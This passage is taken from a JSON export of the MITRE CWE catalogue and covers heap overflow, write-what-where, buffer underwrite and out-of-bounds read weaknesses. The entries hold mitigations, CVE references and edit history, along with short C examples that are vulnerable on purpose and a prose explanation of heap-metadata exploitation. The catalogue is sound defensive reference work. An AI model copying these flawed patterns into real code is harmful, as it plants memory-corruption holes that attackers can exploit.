Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Background_Details, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"122":{"attr":{"@_ID":"122","@_Name":"Heap-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Modify Memory"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\'s code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Pre-design: Use a language or compiler that performs automatic bounds checking."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Pre-design through Build: Canary style bounds checking, library changes which ensure the validity of chunk data, and other such fixes are possible, but should not be relied upon."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, heap-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf;buf = (char *)malloc(sizeof(char)*BUFSIZE);strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The buffer is allocated heap memory with a fixed size, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&\' == user_supplied_string[i] ){}else if (\'<\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t calculated by using ceiling() and floor() on floating point values\\n\\t (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Heap overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Heap Overruns" Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Nonexecutable Stack", Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Protection Mechanisms", Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Heap-based buffer overflows are usually just as dangerous as stack-based buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Observed_Examples, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"123":{"attr":{"@_ID":"123","@_Name":"Write-what-where Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism"],"Note":"Clearly, write-what-where conditions can be used to write data to areas of memory outside the scope of a policy. Also, they almost invariably can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory"],"Note":"Many memory accesses can lead to program termination, such as when writing to addresses that are invalid for the current process."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."},{"Phase":"Operation","Description":"Use OS-level preventative functionality integrated after the fact. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The classic example of a write-what-where condition occurs when the accounting information for memory allocations is overwritten in a particular fashion. Here is an example of potentially vulnerable code:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf1 = (char *) malloc(BUFSIZE);char *buf2 = (char *) malloc(BUFSIZE);strcpy(buf1, argv[1]);free(buf2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":["Vulnerability in this case is dependent on memory layout. The call to strcpy() can be used to write past the end of buf1, and, with a typical layout, can overwrite the accounting information that the system keeps for buf2 when it is allocated. Note that if the allocation header for buf2 can be overwritten, buf2 itself can be overwritten as well.","The allocation header will generally keep a linked list of memory \\"chunks\\". Particularly, there may be a \\"previous\\" chunk and a \\"next\\" chunk. Here, the previous chunk for buf2 will probably be buf1, and the next chunk may be null. When the free() occurs, most memory allocators will rewrite the linked list using data from buf2. Particularly, the \\"next\\" chunk for buf1 will be updated and the \\"previous\\" chunk for any subsequent chunk will be updated. The attacker can insert a memory address for the \\"next\\" chunk and a value to write into that memory address for the \\"previous\\" chunk.","This could be used to overwrite a function pointer that gets dereferenced later, replacing it with a memory address that the attacker has legitimate access to, where they have placed malicious code, resulting in arbitrary code execution."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Write-what-where condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"124":{"attr":{"@_ID":"124","@_Name":"Buffer Underwrite (\'Buffer Underflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"buffer underrun","Description":"Some prominent vendors and researchers use the term \\"buffer underrun\\". \\"Buffer underflow\\" is more commonly used, although both terms are also sometimes used to describe a buffer under-read (CWE-127)."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory","Bypass Protection Mechanism","Other"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. The consequences would only be limited by how the affected data is used, such as an adjacent memory location that is used to specify whether the user has special privileges."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"All calculated values that are used as index or for pointer arithmetic should be validated to ensure that they are within an expected range."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index < length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-24018","Description":"buffer underwrite in firmware verification routine allows code execution via a crafted firmware image","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24018"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNDER - Boundary beginning violation (\'buffer underflow\'?)"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer underwrite"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}}]},"Notes":{"Note":[{"#text":"This could be resultant from several errors, including a bad offset or an array index that decrements before the beginning of the buffer (see CWE-129).","attr":{"@_Type":"Relationship"}},{"#text":"Much attention has been paid to buffer overflows, but \\"underflows\\" sometimes exist in products that are relatively free of overflows, so it is likely that this variant has been under-studied.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Boundary Beginning Violation (\'Buffer Underwrite\')","attr":{"@_Date":"2009-10-29"}}}},"125":{"attr":{"@_ID":"125","@_Name":"Out-of-bounds Read","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. A crash can occur when the code reads a variable amount of data and assumes that a sentinel exists to stop the read operation, such as a NUL in a string. The expected sentinel might not be located in the out-of-bounds memory, causing excessive data to be read, leading to a segmentation fault or a buffer overflow. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent read operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of 